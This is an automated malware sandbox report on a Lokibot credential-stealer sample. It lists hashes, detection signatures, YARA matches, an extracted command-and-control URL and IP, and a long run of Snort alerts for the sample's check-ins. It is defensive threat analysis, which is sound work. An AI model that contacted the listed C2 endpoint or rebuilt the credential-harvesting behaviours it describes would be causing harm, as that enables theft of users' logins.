Analysis Report SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770

Overview

General Information

Sample Name: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770 (renamed file extension from 20770 to exe)
Analysis ID: 325825
MD5: 2aaa15e28835feda9a2e223d82db2126
SHA1: 2c4ace288456010a2717597b192827cd9f7ec771
SHA256: e385b8f5946a41469f49fad4aaeb98e510e79afd0ba6c8546c7b6548da61b8e6
Tags: Loki

Detection

Threat: Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "http://nevomw.com/candy/five/fre.php"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | Loki_1 | Loki Payload | kevoreilly | (strings listed below)
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group | (strings listed below)
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.4852.1.memstr | Malware Configuration Extractor: Lokibot {"c2:": "http://nevomw.com/candy/five/fre.php"}
Multi AV Scanner detection for domain / URL
Source: nevomw.com | Virustotal: Detection: 10%
Source: http://nevomw.com/candy/five/fre.php | Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Virustotal: Detection: 39%
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | ReversingLabs: Detection: 20%
Machine Learning detection for sample
Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 1_2_00403D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Code function: 4x nop then jmp 07AC5FADh 0_2_07AC5F28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe | Code function: 4x nop then jmp 07AC5FADh 0_2_07AC5F38

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49757
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49758
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49759
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49760
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49761
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49762
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49763
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49764
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49765
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49766
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49767
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49768
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49769
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49770
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49771
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49772
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49773
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49774
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49775
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49776
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49778
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49779
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49781
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49783
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49787
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49789
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49791
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49793
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49795
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49797
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49799
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49800
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49802
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49804
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49805
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 45.144.3.234:80
